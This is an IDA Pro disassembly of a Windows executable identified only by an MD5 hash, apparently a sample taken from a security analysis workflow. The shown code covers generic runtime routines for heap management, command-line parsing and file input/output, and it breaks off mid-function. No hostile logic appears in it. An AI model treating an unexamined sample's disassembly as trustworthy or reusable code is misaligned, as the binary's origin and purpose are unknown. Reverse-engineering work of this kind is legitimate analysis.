;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 2AA59BA4251795DEDA72738D1C67BE7C
; File Name : u:\work\2aa59ba4251795deda72738d1c67be7c_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000387C ( 14460.)
; Section size in file : 00003A00 ( 14848.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
CODE segment para public 'CODE' use32
assume cs:CODE
;org 401000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
off_401000 dd offset dword_401004 ; DATA XREF: CODE:0040314C�o
; CODE:00403154�o
dword_401004 dd 7453060Ah, 676E6972h ; DATA XREF: CODE:off_401000�o
; [00000006 BYTES: COLLAPSED FUNCTION GetProcessHeap. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION HeapAlloc. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION HeapReAlloc. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION HeapFree. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION FreeLibrary. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetModuleFileNameA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetModuleHandleA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION LocalAlloc. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION TlsGetValue. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION TlsSetValue. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetCommandLineA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION CloseHandle. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION CreateFileA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetFileType. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetSystemTime. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetFileSize. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetStdHandle. PRESS KEYPAD "+" TO EXPAND]
align 4
loc_401094: ; DATA XREF: sub_401C70�o
jmp ds:RaiseException
; ---------------------------------------------------------------------------
align 4
; [00000006 BYTES: COLLAPSED FUNCTION ReadFile. PRESS KEYPAD "+" TO EXPAND]
align 4
loc_4010A4: ; DATA XREF: sub_401C70+A�o
jmp ds:RtlUnwind
; ---------------------------------------------------------------------------
align 4
; [00000006 BYTES: COLLAPSED FUNCTION SetEndOfFile. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION SetFilePointer. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION WriteFile. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION CharNextA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION ExitProcess. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetLastError. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION SysReAllocStringLen. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION SysFreeString. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetCurrentThreadId. PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
sub_4010F4 proc near ; CODE XREF: sub_401144+4�p
; sub_401174+3F�p
; DATA XREF: ...
push eax ; dwBytes
mov eax, ds:dwFlags
push eax ; dwFlags
mov eax, ds:hHeap
push eax ; hHeap
call HeapAlloc
retn
sub_4010F4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401108 proc near ; CODE XREF: sub_40115C+4�p
; sub_401174+26�p
; DATA XREF: ...
push ebx
mov ebx, eax
push ebx ; lpMem
mov eax, ds:dwFlags
and eax, 1
push eax ; dwFlags
mov eax, ds:hHeap
push eax ; hHeap
call HeapFree
cmp eax, 1
sbb eax, eax
neg eax
and eax, 7Fh
pop ebx
retn
sub_401108 endp
; =============== S U B R O U T I N E =======================================
sub_40112C proc near ; CODE XREF: sub_401174+D�p
; DATA XREF: DATA:off_405048�o
push edx ; dwBytes
push eax ; lpMem
mov eax, ds:dwFlags
and eax, 0
push eax ; dwFlags
mov eax, ds:hHeap
push eax ; hHeap
call HeapReAlloc
retn
sub_40112C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401144 proc near ; CODE XREF: sub_401E84+C�p
; sub_40265C+CA�p ...
test eax, eax
jz short locret_401152
call ds:off_405040
or eax, eax
jz short loc_401153
locret_401152: ; CODE XREF: sub_401144+2�j
retn
; ---------------------------------------------------------------------------
loc_401153: ; CODE XREF: sub_401144+C�j
mov al, 1
jmp sub_40121C
sub_401144 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40115C proc near ; CODE XREF: sub_401DC4+1B�p
; sub_401DE8+20�p ...
test eax, eax
jz short locret_40116A
call ds:off_405044
or eax, eax
jnz short loc_40116B
locret_40116A: ; CODE XREF: sub_40115C+2�j
retn
; ---------------------------------------------------------------------------
loc_40116B: ; CODE XREF: sub_40115C+C�j
mov al, 2
jmp sub_40121C
sub_40115C endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401174 proc near ; CODE XREF: sub_402184+22�p
; sub_40265C+BB�p
mov ecx, [eax]
test ecx, ecx
jz short loc_4011AC
test edx, edx
jz short loc_401196
push eax
mov eax, ecx
call ds:off_405048
pop ecx
or eax, eax
jz short loc_4011A5
mov [ecx], eax
retn
; ---------------------------------------------------------------------------
loc_40118F: ; CODE XREF: sub_401174+2E�j
mov al, 2
jmp sub_40121C
; ---------------------------------------------------------------------------
loc_401196: ; CODE XREF: sub_401174+8�j
mov [eax], edx
mov eax, ecx
call ds:off_405044
or eax, eax
jnz short loc_40118F
retn
; ---------------------------------------------------------------------------
loc_4011A5: ; CODE XREF: sub_401174+16�j
; sub_401174+48�j
mov al, 1
jmp sub_40121C
; ---------------------------------------------------------------------------
loc_4011AC: ; CODE XREF: sub_401174+4�j
test edx, edx
jz short locret_4011C0
push eax
mov eax, edx
call ds:off_405040
pop ecx
or eax, eax
jz short loc_4011A5
mov [ecx], eax
locret_4011C0: ; CODE XREF: sub_401174+3A�j
retn
sub_401174 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4011C4 proc near ; CODE XREF: sub_4011D0+42�p
mov ds:dword_405004, edx
call sub_401DAC
sub_4011C4 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4011D0 proc near ; CODE XREF: sub_40121C+6�j
push ebx
push esi
mov esi, edx
mov ebx, eax
and bl, 7Fh
cmp ds:dword_406004, 0
jz short loc_4011EC
mov edx, esi
mov eax, ebx
call ds:dword_406004
loc_4011EC: ; CODE XREF: sub_4011D0+10�j
test bl, bl
jnz short loc_4011FD
call sub_40299C
mov ebx, [eax+0]
jmp short loc_40120C
; ---------------------------------------------------------------------------
loc_4011FD: ; CODE XREF: sub_4011D0+1E�j
cmp bl, 18h
ja short loc_40120C
xor eax, eax
mov al, bl
mov bl, ds:byte_40504C[eax]
loc_40120C: ; CODE XREF: sub_4011D0+2B�j
; sub_4011D0+30�j
xor eax, eax
mov al, bl
mov edx, esi
call sub_4011C4
sub_4011D0 endp
; ---------------------------------------------------------------------------
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_40121C proc near ; CODE XREF: sub_401144+11�j
; sub_40115C+11�j ...
and eax, 7Fh
mov edx, [esp+0]
jmp sub_4011D0
sub_40121C endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_401228 proc near ; CODE XREF: sub_402CDC+59�p
; sub_402CDC+69�p ...
push eax
push edx
push ecx
call sub_40299C
cmp dword ptr [eax+0], 0
pop ecx
pop edx
pop eax
jnz short loc_40123D
retn
; ---------------------------------------------------------------------------
loc_40123D: ; CODE XREF: sub_401228+12�j
xor eax, eax
jmp sub_40121C
sub_401228 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401248 proc near ; CODE XREF: sub_401258+5�p
; sub_40171C+36�p ...
push ebx
mov ebx, eax
call sub_40299C
mov [eax+0], ebx
pop ebx
retn
sub_401248 endp
; =============== S U B R O U T I N E =======================================
sub_401258 proc near ; CODE XREF: sub_40185C+28�p
; sub_4018E4+17�p
call GetLastError
call sub_401248
retn
sub_401258 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401264 proc near ; CODE XREF: sub_4016A4+4F�p
; sub_401840+14�p ...
cmp ecx, 4
jge short loc_401285
jcxz locret_4012C3
cmp eax, edx
jz short locret_4012C3
push esi
push edi
mov esi, eax
mov edi, edx
ja short loc_401281
lea esi, [ecx+esi-1]
lea edi, [ecx+edi-1]
std
loc_401281: ; CODE XREF: sub_401264+12�j
rep movsb
jmp short loc_4012B1
; ---------------------------------------------------------------------------
loc_401285: ; CODE XREF: sub_401264+3�j
cmp eax, edx
jz short locret_4012C3
push esi
push edi
mov esi, eax
mov edi, edx
mov eax, ecx
ja short loc_4012B3
and ecx, 3
lea esi, [eax+esi-1]
lea edi, [eax+edi-1]
std
rep movsb
sar eax, 2
mov ecx, eax
mov eax, 3
sub esi, eax
sub edi, eax
rep movsd
loc_4012B1: ; CODE XREF: sub_401264+1F�j
cld
dec ecx
loc_4012B3: ; CODE XREF: sub_401264+2D�j
sar ecx, 2
js short loc_4012C1
rep movsd
and eax, 3
mov ecx, eax
rep movsb
loc_4012C1: ; CODE XREF: sub_401264+52�j
pop edi
pop esi
locret_4012C3: ; CODE XREF: sub_401264+5�j
; sub_401264+A�j ...
retn
sub_401264 endp
; =============== S U B R O U T I N E =======================================
sub_4012C4 proc near ; CODE XREF: sub_4013B0+41�p
push ebx
push esi
push edi
push ebp
mov esi, edx
mov ebx, eax
jmp short loc_4012D6
; ---------------------------------------------------------------------------
loc_4012CE: ; CODE XREF: sub_4012C4+1A�j
push ebx ; lpsz
call CharNextA
mov ebx, eax
loc_4012D6: ; CODE XREF: sub_4012C4+8�j
; sub_4012C4+2A�j
mov al, [ebx]
test al, al
jz short loc_4012E0
cmp al, 20h
jbe short loc_4012CE
loc_4012E0: ; CODE XREF: sub_4012C4+16�j
cmp byte ptr [ebx], 22h
jnz short loc_4012F0
cmp byte ptr [ebx+1], 22h
jnz short loc_4012F0
add ebx, 2
jmp short loc_4012D6
; ---------------------------------------------------------------------------
loc_4012F0: ; CODE XREF: sub_4012C4+1F�j
; sub_4012C4+25�j
xor ebp, ebp
mov edi, ebx
jmp short loc_401339
; ---------------------------------------------------------------------------
loc_4012F6: ; CODE XREF: sub_4012C4+79�j
cmp al, 22h
jnz short loc_40132B
push ebx ; lpsz
call CharNextA
mov ebx, eax
jmp short loc_401312
; ---------------------------------------------------------------------------
loc_401304: ; CODE XREF: sub_4012C4+56�j
push ebx ; lpsz
call CharNextA
mov edx, eax
sub edx, ebx
add ebp, edx
mov ebx, eax
loc_401312: ; CODE XREF: sub_4012C4+3E�j
mov al, [ebx]
test al, al
jz short loc_40131C
cmp al, 22h
jnz short loc_401304
loc_40131C: ; CODE XREF: sub_4012C4+52�j
cmp byte ptr [ebx], 0
jz short loc_401339
push ebx ; lpsz
call CharNextA
mov ebx, eax
jmp short loc_401339
; ---------------------------------------------------------------------------
loc_40132B: ; CODE XREF: sub_4012C4+34�j
push ebx ; lpsz
call CharNextA
mov edx, eax
sub edx, ebx
add ebp, edx
mov ebx, eax
loc_401339: ; CODE XREF: sub_4012C4+30�j
; sub_4012C4+5B�j ...
mov al, [ebx]
cmp al, 20h
ja short loc_4012F6
mov eax, esi
mov edx, ebp
call sub_402184
mov ebx, edi
mov edi, [esi]
xor esi, esi
jmp short loc_4013A1
; ---------------------------------------------------------------------------
loc_401350: ; CODE XREF: sub_4012C4+E1�j
cmp al, 22h
jnz short loc_40138C
push ebx ; lpsz
call CharNextA
mov ebx, eax
jmp short loc_401373
; ---------------------------------------------------------------------------
loc_40135E: ; CODE XREF: sub_4012C4+B7�j
push ebx ; lpsz
call CharNextA
cmp eax, ebx
jbe short loc_401373
loc_401368: ; CODE XREF: sub_4012C4+AD�j
mov dl, [ebx]
mov [edi+esi], dl
inc ebx
inc esi
cmp eax, ebx
ja short loc_401368
loc_401373: ; CODE XREF: sub_4012C4+98�j
; sub_4012C4+A2�j
mov al, [ebx]
test al, al
jz short loc_40137D
cmp al, 22h
jnz short loc_40135E
loc_40137D: ; CODE XREF: sub_4012C4+B3�j
cmp byte ptr [ebx], 0
jz short loc_4013A1
push ebx ; lpsz
call CharNextA
mov ebx, eax
jmp short loc_4013A1
; ---------------------------------------------------------------------------
loc_40138C: ; CODE XREF: sub_4012C4+8E�j
push ebx ; lpsz
call CharNextA
cmp eax, ebx
jbe short loc_4013A1
loc_401396: ; CODE XREF: sub_4012C4+DB�j
mov dl, [ebx]
mov [edi+esi], dl
inc ebx
inc esi
cmp eax, ebx
ja short loc_401396
loc_4013A1: ; CODE XREF: sub_4012C4+8A�j
; sub_4012C4+BC�j ...
mov al, [ebx]
cmp al, 20h
ja short loc_401350
mov eax, ebx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4012C4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4013B0 proc near ; CODE XREF: CODE:00404096�p
; CODE:004041CB�p ...
Filename = byte ptr -114h
push ebx
push esi
push edi
add esp, 0FFFFFEF8h
mov ebx, edx
mov esi, eax
mov eax, ebx
call sub_401DC4
test esi, esi
jnz short loc_4013E6
push 105h ; nSize
lea eax, [esp+118h+Filename]
push eax ; lpFilename
push 0 ; hModule
call GetModuleFileNameA
mov ecx, eax
mov edx, esp
mov eax, ebx
call sub_401EB0
jmp short loc_401404
; ---------------------------------------------------------------------------
loc_4013E6: ; CODE XREF: sub_4013B0+16�j
call GetCommandLineA
mov edi, eax
loc_4013ED: ; CODE XREF: sub_4013B0+52�j
mov edx, ebx
mov eax, edi
call sub_4012C4
mov edi, eax
test esi, esi
jz short loc_401404
cmp dword ptr [ebx], 0
jz short loc_401404
dec esi
jmp short loc_4013ED
; ---------------------------------------------------------------------------
loc_401404: ; CODE XREF: sub_4013B0+34�j
; sub_4013B0+4A�j ...
add esp, 108h
pop edi
pop esi
pop ebx
retn
sub_4013B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401410 proc near ; CODE XREF: CODE:004041EA�p
SystemTime = _SYSTEMTIME ptr -18h
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
lea eax, [ebp+SystemTime]
push eax ; lpSystemTime
call GetSystemTime
movzx eax, [ebp+SystemTime.wHour]
imul eax, 3Ch
add ax, [ebp+SystemTime.wMinute]
imul eax, 3Ch
xor edx, edx
mov dx, [ebp+SystemTime.wSecond]
add eax, edx
imul eax, 3E8h
mov dx, [ebp+SystemTime.wMilliseconds]
add eax, edx
mov ds:dword_405008, eax
mov esp, ebp
pop ebp
retn
sub_401410 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40144C proc near ; DATA XREF: CODE:00401528�o
push ebx
mov ebx, eax
xor eax, eax
mov [ebx+10h], eax
xor eax, eax
mov [ebx+0Ch], eax
push 0 ; lpOverlapped
lea eax, [ebx+10h]
push eax ; lpNumberOfBytesRead
mov eax, [ebx+8]
push eax ; nNumberOfBytesToRead
mov eax, [ebx+14h]
push eax ; lpBuffer
mov eax, [ebx]
push eax ; hFile
call ReadFile
test eax, eax
jnz short loc_401481
call GetLastError
cmp eax, 6Dh
jnz short loc_401483
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401481: ; CODE XREF: sub_40144C+25�j
xor eax, eax
loc_401483: ; CODE XREF: sub_40144C+2F�j
pop ebx
retn
sub_40144C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401488 proc near ; DATA XREF: CODE:0040155F�o
; CODE:0040162F�o ...
xor eax, eax
retn
sub_401488 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40148C proc near ; DATA XREF: CODE:loc_401551�o
; CODE:00401677�o
NumberOfBytesWritten= dword ptr -0Ch
push ebx
push esi
push ecx
mov ebx, eax
mov esi, [ebx+0Ch]
test esi, esi
jnz short loc_40149C
xor eax, eax
jmp short loc_4014C2
; ---------------------------------------------------------------------------
loc_40149C: ; CODE XREF: sub_40148C+A�j
push 0 ; lpOverlapped
lea eax, [esp+10h+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push esi ; nNumberOfBytesToWrite
mov eax, [ebx+14h]
push eax ; lpBuffer
mov eax, [ebx]
push eax ; hFile
call WriteFile
test eax, eax
jnz short loc_4014BB
call GetLastError
jmp short loc_4014BD
; ---------------------------------------------------------------------------
loc_4014BB: ; CODE XREF: sub_40148C+26�j
xor eax, eax
loc_4014BD: ; CODE XREF: sub_40148C+2D�j
xor edx, edx
mov [ebx+0Ch], edx
loc_4014C2: ; CODE XREF: sub_40148C+E�j
pop edx
pop esi
pop ebx
retn
sub_40148C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4014C8 proc near ; CODE XREF: sub_4014D8+B�p
; sub_4018E4+E�p
push ebx
mov ebx, eax
push ebx ; hObject
call CloseHandle
dec eax
setz al
pop ebx
retn
sub_4014C8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4014D8 proc near ; DATA XREF: CODE:loc_401558�o
push ebx
mov ebx, eax
mov word ptr [ebx+4], 0D7B0h
mov eax, [ebx]
call sub_4014C8
test al, al
jnz short loc_4014F3
call GetLastError
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4014F3: ; CODE XREF: sub_4014D8+12�j
xor eax, eax
pop ebx
retn
sub_4014D8 endp
; ---------------------------------------------------------------------------
align 4
loc_4014F8: ; DATA XREF: sub_4016A4+35�o
push esi
mov esi, eax
xor eax, eax
mov [esi+0Ch], eax
mov [esi+10h], eax
mov ax, [esi+4]
sub eax, 0D7B1h
jz short loc_401519
dec eax
jz short loc_401531
dec eax
jz short loc_401542
jmp loc_401680
; ---------------------------------------------------------------------------
loc_401519: ; CODE XREF: CODE:0040150C�j
mov eax, 80000000h
mov edx, 1
mov ecx, 3
mov dword ptr [esi+1Ch], offset sub_40144C
jmp short loc_401558
; ---------------------------------------------------------------------------
loc_401531: ; CODE XREF: CODE:0040150F�j
mov eax, 40000000h
mov edx, 1
mov ecx, 2
jmp short loc_401551
; ---------------------------------------------------------------------------
loc_401542: ; CODE XREF: CODE:00401512�j
mov eax, 0C0000000h
mov edx, 1
mov ecx, 3
loc_401551: ; CODE XREF: CODE:00401540�j
mov dword ptr [esi+1Ch], offset sub_40148C
loc_401558: ; CODE XREF: CODE:0040152F�j
mov dword ptr [esi+24h], offset sub_4014D8
mov dword ptr [esi+20h], offset sub_401488
cmp byte ptr [esi+48h], 0
jz loc_401622
push 0
push 80h
push ecx
push 0
push edx
push eax
lea eax, [esi+48h]
push eax
call CreateFileA
cmp eax, 0FFFFFFFFh
jz loc_401696
mov [esi], eax
cmp word ptr [esi+4], 0D7B3h
jnz loc_40165F
dec word ptr [esi+4]
push 0
push dword ptr [esi]
call GetFileSize
inc eax
jz loc_401696
sub eax, 81h
jnb short loc_4015B9
xor eax, eax
loc_4015B9: ; CODE XREF: CODE:004015B5�j
push 0
push 0
push eax
push dword ptr [esi]
call SetFilePointer
inc eax
jz loc_401696
push 0
mov edx, esp
push 0
push edx
push 80h
lea edx, [esi+14Ch]
push edx
push dword ptr [esi]
call ReadFile
pop edx
dec eax
jnz loc_401696
xor eax, eax
loc_4015F0: ; CODE XREF: CODE:004015FF�j
cmp eax, edx
jnb short loc_40165F
cmp byte ptr [esi+eax+14Ch], 0Eh
jz short loc_401601
inc eax
jmp short loc_4015F0
; ---------------------------------------------------------------------------
loc_401601: ; CODE XREF: CODE:004015FC�j
push 2
push 0
sub eax, edx
push eax
push dword ptr [esi]
call SetFilePointer
inc eax
jz loc_401696
push dword ptr [esi]
call SetEndOfFile
dec eax
jnz short loc_401696
jmp short loc_40165F
; ---------------------------------------------------------------------------
loc_401622: ; CODE XREF: CODE:0040156A�j
lea eax, [esi+14Ch]
mov dword ptr [esi+8], 80h
mov dword ptr [esi+24h], offset sub_401488
mov [esi+14h], eax
cmp word ptr [esi+4], 0D7B2h
jz short loc_401645
push 0FFFFFFF6h
jmp short loc_401653
; ---------------------------------------------------------------------------
loc_401645: ; CODE XREF: CODE:0040163F�j
cmp esi, offset dword_4061F0
jnz short loc_401651
push 0FFFFFFF4h
jmp short loc_401653
; ---------------------------------------------------------------------------
loc_401651: ; CODE XREF: CODE:0040164B�j
push 0FFFFFFF5h
loc_401653: ; CODE XREF: CODE:00401643�j
; CODE:0040164F�j
call GetStdHandle
cmp eax, 0FFFFFFFFh
jz short loc_401696
mov [esi], eax
loc_40165F: ; CODE XREF: CODE:00401596�j
; CODE:004015F2�j ...
cmp word ptr [esi+4], 0D7B1h
jz short loc_40167E
push dword ptr [esi]
call GetFileType
test eax, eax
jz short loc_401682
cmp eax, 2
jnz short loc_40167E
mov dword ptr [esi+20h], offset sub_40148C
loc_40167E: ; CODE XREF: CODE:00401665�j
; CODE:00401675�j
xor eax, eax
loc_401680: ; CODE XREF: CODE:00401514�j
; CODE:00401694�j ...
pop esi
retn
; ---------------------------------------------------------------------------
loc_401682: ; CODE XREF: CODE:00401670�j
push dword ptr [esi]
call CloseHandle
mov word ptr [esi+4], 0D7B0h
mov eax, 69h
jmp short loc_401680
; ---------------------------------------------------------------------------
loc_401696: ; CODE XREF: CODE:00401588�j
; CODE:004015AA�j ...
mov word ptr [esi+4], 0D7B0h
call GetLastError
jmp short loc_401680
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4016A4 proc near ; CODE XREF: sub_402CDC+44�p
; CODE:004042D5�p ...
push ebx
push esi
mov esi, edx
mov ebx, eax
mov eax, ebx
xor ecx, ecx
mov edx, 14Ch
call sub_4018A8
lea eax, [ebx+14Ch]
mov [ebx+14h], eax
mov word ptr [ebx+4], 0D7B0h
xor eax, eax
mov al, ds:byte_405014
mov [ebx+6], ax
mov dword ptr [ebx+8], 80h
mov dword ptr [ebx+18h], offset loc_4014F8
mov eax, esi
call sub_401F04
push eax
mov eax, esi
call sub_402058
lea edx, [ebx+48h]
pop ecx
call sub_401264
mov eax, esi
call sub_401F04
mov byte ptr [ebx+eax+48h], 0
xor eax, eax
pop esi
pop ebx
retn
sub_4016A4 endp
; ---------------------------------------------------------------------------
align 4
loc_40170C: ; DATA XREF: sub_4017A8+D�o
jmp ds:__imp_ReadFile
; ---------------------------------------------------------------------------
align 4
loc_401714: ; DATA XREF: sub_4017C8+D�o
jmp ds:__imp_WriteFile
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40171C proc near ; CODE XREF: sub_4017A8+14�p
; sub_4017C8+14�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, ecx
mov edi, edx
mov ebx, eax
mov eax, [ebp+arg_8]
movzx edx, word ptr [ebx+4]
and edx, eax
cmp eax, edx
jnz short loc_40178E
push 0
lea eax, [ebp+var_4]
push eax
mov eax, [ebx+8]
imul esi
push eax
push edi
mov eax, [ebx]
push eax
call [ebp+arg_4]
test eax, eax
jnz short loc_40175E
call GetLastError
call sub_401248
xor eax, eax
mov [ebp+var_4], eax
jmp short loc_40179D
; ---------------------------------------------------------------------------
loc_40175E: ; CODE XREF: sub_40171C+2F�j
mov eax, [ebp+var_4]
xor edx, edx
div dword ptr [ebx+8]
mov [ebp+var_4], eax
mov eax, [ebp+arg_C]
test eax, eax
jz short loc_40177A
mov eax, [ebp+arg_C]
mov edx, [ebp+var_4]
mov [eax], edx
jmp short loc_40179D
; ---------------------------------------------------------------------------
loc_40177A: ; CODE XREF: sub_40171C+52�j
cmp esi, [ebp+var_4]
jz short loc_40179D
mov eax, [ebp+arg_0]
call sub_401248
xor eax, eax
mov [ebp+var_4], eax
jmp short loc_40179D
; ---------------------------------------------------------------------------
loc_40178E: ; CODE XREF: sub_40171C+18�j
mov eax, 67h
call sub_401248
xor eax, eax
mov [ebp+var_4], eax
loc_40179D: ; CODE XREF: sub_40171C+40�j
; sub_40171C+5C�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn 10h
sub_40171C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017A8 proc near ; CODE XREF: sub_402CDC+A0�p
; sub_402CDC+10E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push ebx
push 0D7B1h
push offset loc_40170C
push 64h
call sub_40171C
pop ebx
pop ebp
retn 4
sub_4017A8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017C8 proc near ; CODE XREF: CODE:0040430D�p
; CODE:00404511�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push ebx
push 0D7B2h
push offset loc_401714
push 65h
call sub_40171C
pop ebx
pop ebp
retn 4
sub_4017C8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4017E8 proc near ; CODE XREF: sub_402CDC+128�p
; CODE:0040431C�p ...
push ebx
push esi
mov ebx, eax
xor esi, esi
mov ax, [ebx+4]
cmp ax, 0D7B1h
jb short loc_401827
cmp ax, 0D7B3h
ja short loc_401827
and ax, 0D7B2h
cmp ax, 0D7B2h
jnz short loc_40180F
mov eax, ebx
call dword ptr [ebx+1Ch]
mov esi, eax
loc_40180F: ; CODE XREF: sub_4017E8+1E�j
test esi, esi
jnz short loc_40181A
mov eax, ebx
call dword ptr [ebx+24h]
mov esi, eax
loc_40181A: ; CODE XREF: sub_4017E8+29�j
test esi, esi
jz short loc_401839
mov eax, esi
call sub_401248
jmp short loc_401839
; ---------------------------------------------------------------------------
loc_401827: ; CODE XREF: sub_4017E8+E�j
; sub_4017E8+14�j
cmp ebx, offset dword_406024
jz short loc_401839
mov eax, 67h
call sub_401248
loc_401839: ; CODE XREF: sub_4017E8+34�j
; sub_4017E8+3D�j ...
mov eax, esi
pop esi
pop ebx
retn
sub_4017E8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401840 proc near ; CODE XREF: sub_4030FC+1F�p
push ebx
mov bl, [edx]
cmp cl, bl
jbe short loc_401849
mov ecx, ebx
loc_401849: ; CODE XREF: sub_401840+5�j
mov [eax], cl
inc edx
inc eax
and ecx, 0FFh
xchg eax, edx
call sub_401264
pop ebx
retn
sub_401840 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40185C proc near ; CODE XREF: sub_402CDC+64�p
; sub_402CDC+C0�p
push ebx
push esi
mov ebx, eax
or esi, 0FFFFFFFFh
mov ax, [ebx+4]
cmp ax, 0D7B0h
jbe short loc_401896
cmp ax, 0D7B3h
ja short loc_401896
push 0 ; lpFileSizeHigh
mov eax, [ebx]
push eax ; hFile
call GetFileSize
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40188B
call sub_401258
jmp short loc_4018A0
; ---------------------------------------------------------------------------
loc_40188B: ; CODE XREF: sub_40185C+26�j
mov eax, esi
xor edx, edx
div dword ptr [ebx+8]
mov esi, eax
jmp short loc_4018A0
; ---------------------------------------------------------------------------
loc_401896: ; CODE XREF: sub_40185C+F�j
; sub_40185C+15�j
mov eax, 67h
call sub_401248
loc_4018A0: ; CODE XREF: sub_40185C+2D�j
